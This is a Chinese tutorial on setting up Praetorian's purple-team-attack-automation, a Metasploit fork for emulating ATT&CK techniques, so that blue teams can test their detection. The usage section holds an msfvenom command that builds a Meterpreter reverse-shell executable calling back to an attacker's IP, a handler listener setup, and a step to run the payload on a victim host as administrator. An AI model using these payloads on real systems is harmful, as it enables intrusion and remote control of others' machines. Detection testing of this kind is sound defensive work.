当前位置: 代码迷 >> 综合 >> purple-team-attack-automation(紫色团队攻击自动化)学习与研究
  详细解决方案

purple-team-attack-automation(紫色团队攻击自动化)学习与研究

热度:69   发布时间:2024-01-24 19:23:14.0

1. 简介

该工具是原始metasploit框架的分支,用于模拟攻击者的战术,技术和程序(TTP)。该工具的主要重点是帮助Blue Teams了解其映射到MITER ATT&CK?框架的检测差距。

2. 可用模块

2.1 Windows

  • Windows:ADIDNS(PowerMad)
  • Windows:Active Directory自动发现(BloodHound)
  • Windows:数据压缩(T1002)
  • Windows:凭证转储(T1003)
  • Windows:Winlogon帮助器DLL(T1004)
  • Windows:来自本地系统的数据(T1005)
  • Windows:系统服务发现(T1007)
  • Windows:应用程序窗口发现(T1010)
  • Windows:查询注册表(T1012)
  • Windows:端口监视器(T1013)
  • Windows:辅助功能(T1015)
  • Windows:系统网络配置发现(T1016)
  • Windows:远程系统发现(T1018)
  • Windows:快捷方式修改(T1023)
  • Windows:Windows远程管理(T1028)
  • Windows:修改现有服务(T1031)
  • Windows:系统所有者/用户发现(T1033)
  • Windows:路径拦截(T1034)
  • Windows:服务执行(T1035)
  • Windows:伪装(T1036)
  • Windows:登录脚本(T1037)
  • Windows:文件系统权限不足(T1044)
  • Windows:Windows管理规范(T1047)
  • Windows:系统网络连接发现(T1049)
  • Windows:新服务(T1050)
  • Windows:计划任务(T1053)
  • Windows:流程注入(T1055)
  • Windows:输入捕获(T1056)
  • Windows:进程发现(T1057)
  • Windows:运行键(T1060)
  • Windows:安全软件发现(T1063)
  • Windows:权限组发现(T1069)
  • Windows:从工具中删除指示器(T1070)
  • Windows:通过哈希(T1075)
  • Windows:Windows管理员共享(T1077)
  • Windows:有效帐户(T1078)
  • Windows:文件中的凭据(T1081)
  • Windows:系统信息发现(T1082)
  • Windows:文件和目录发现(T1083)
  • Windows:Windows管理规范事件订阅(1084)
  • Windows:Rundll32(T1085)
  • Windows:PowerShell(T1086)
  • Windows:帐户发现(T1087)
  • Windows:绕过UAC(T1088)
  • Windows:禁用安全工具(T1089)
  • Windows:Windows NTFS扩展属性(T1096)
  • Windows:帐户操作(T1098)
  • Windows:Timestomp(T1099)
  • Windows:AppInit DLL(T1103)
  • Windows:远程文件复制(T1105)
  • Windows:文件删除(T1107)
  • Windows:暴力破解(T1110)
  • Windows:修改注册表(T1112)
  • Windows:屏幕捕获(T1113)
  • Windows:剪贴板数据(T1115)
  • Windows:Regsvr32(T1117)
  • Windows:InstallUtil(T1118)
  • Windows:自动收集(T1119)
  • Windows:外围设备发现(T1120)
  • Windows:Regsvcs/Regasm(T1121)
  • Windows:音频捕获(T1123)
  • Windows:系统时间发现(T1124)
  • Windows:视频捕获(T1125)
  • Windows:受信任的开发人员实用程序(T1127)
  • Windows:安装根证书(T1130)
  • Windows:身份验证程序包(T1131)
  • Windows:网络共享发现(T1135)
  • Windows:创建帐户(T1136)
  • Windows:MSHTA(T1170)
  • Windows:分布式组件对象模型(T1175)
  • Windows:屏幕保护程序(T1180)
  • Windows:CMSTP(T1191)
  • Windows:控制面板项目(T1196)
  • Windows:BITS作业(T1197)
  • Windows:密码策略发现(T1201)
  • Windows:Kerberoasting(T1208)
  • Windows:时间提供者(T1209)
  • Windows:签名的二进制代理执行(T1218)

2.2 Linux

  • Linux:系统网络配置发现(T1016)
  • Linux:系统所有者/用户发现(T1033)
  • Linux:系统网络连接发现(T1049)
  • Linux:进程发现(T1057)
  • Linux:权限组发现(T1069)
  • Linux:系统信息发现(T1082)
  • Linux:帐户发现(T1087)
  • Linux:文件删除(T1107)
  • Linux:密码策略发现(T1201)

2.3 MacOS

  • macOS:数据压缩(T1002)
  • macOS:系统网络配置发现(T1016)
  • macOS:网络共享发现(T1135)
  • macOS:创建帐户(T1136)
  • macOS:Bash历史记录(T1139)
  • macOS:密码策略发现(T1201)

2.4 Multi

  • Multi:远程系统发现(T1018)
  • Multi:网络服务扫描(T1046)

具体可参考官方wiki介绍:https://github.com/praetorian-code/purple-team-attack-automation/wiki/Available-Modules

2.工具部署及安装方法

2.1 docker/docker-compose安装

apt-get install docker docker-compose

2.2 下载项目文件至本地

git clone https://github.com/praetorian-code/purple-team-attack-automation.git

2.3 修改LHOST和端口

echo "version: '3' services:ms:environment:# example of setting LHOSTLHOST: 0.0.0.0# example of adding more portsports:- 8080:8080- 443:443- 80:80 " > docker-compose.local.override.yml #此文件需要自行创建,然后复制上述内容写入文档即可

2.4 设置COMPOSE_FILE环境变量

echo "COMPOSE_FILE=./docker-compose.yml:./docker-compose.override.yml:./docker-compose.local.override.yml" >> .env

2.5 运行docker服务并运行工具

service docker start
docker-compose build
./docker/bin/msfconsole #当前目录下执行此命令

在这里插入图片描述
其他环境安装可参考官方说明:https://github.com/praetorian-code/purple-team-attack-automation/wiki/Installation

3. 操作与使用

3.1 生成Meterpreter有效载荷

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<Your locahost IP> LPORT=4444 -f exe > meterpreter.exe  #新建窗口执行命令,利用此命令生成的MSF载荷可能存在问题,建议自行修改

3.2 启动并运行本地监听

 use exploit/multi/handlerset Interrupt: use the 'exit' command to quitset PAYLOAD windows/meterpreter/reverse_tcpset LHOST <Attacker IP Address>set LPORT 4444exploit -j -z# docker msfconsole中执行监听命令

端口监听
复制并在目标(“受害者”)主机上以管理员身份运行payload.exe,然后等待会话。
运行载荷
等待会话

3.3 查看已有TTP模块

search purple
# docker msfconsole中执行

查找可以使用的模块

3.4 模拟T1087

use modules/post/windows/purple/t1087 #设置要使用的TTP
info #查看TTP模块配置
set session 1  #设置会话
run #执行载荷
#docker msfconsole中执行

选择使用的模块设置会话并执行

后续

安全从业人员(尤其是蓝队成员),可以利用purple-team-attack-automation模拟相关TTP,并在客户端部署并配置相关审核策略,记录相关事件日志(windows_log/sysmon/message),并转发至大数据分析平台(splunk/elk等)进行数据分析,提升蓝队成员对攻击的理解以及对异常行为的敏感度。

关于purple-team-attack-automation(紫色团队攻击自动化)更多信息可参考项目原址介绍:https://github.com/praetorian-code/purple-team-attack-automation

关于ATT&CK具体TTP中文介绍可参考瀚思科技MITRE ATT&CK 攻击知识库(企业)中文版项目:https://hansight.github.io/#/

关于ATT&CK具体TTP原文介绍可参考MITER官方介绍:https://attack.mitre.org/

  相关解决方案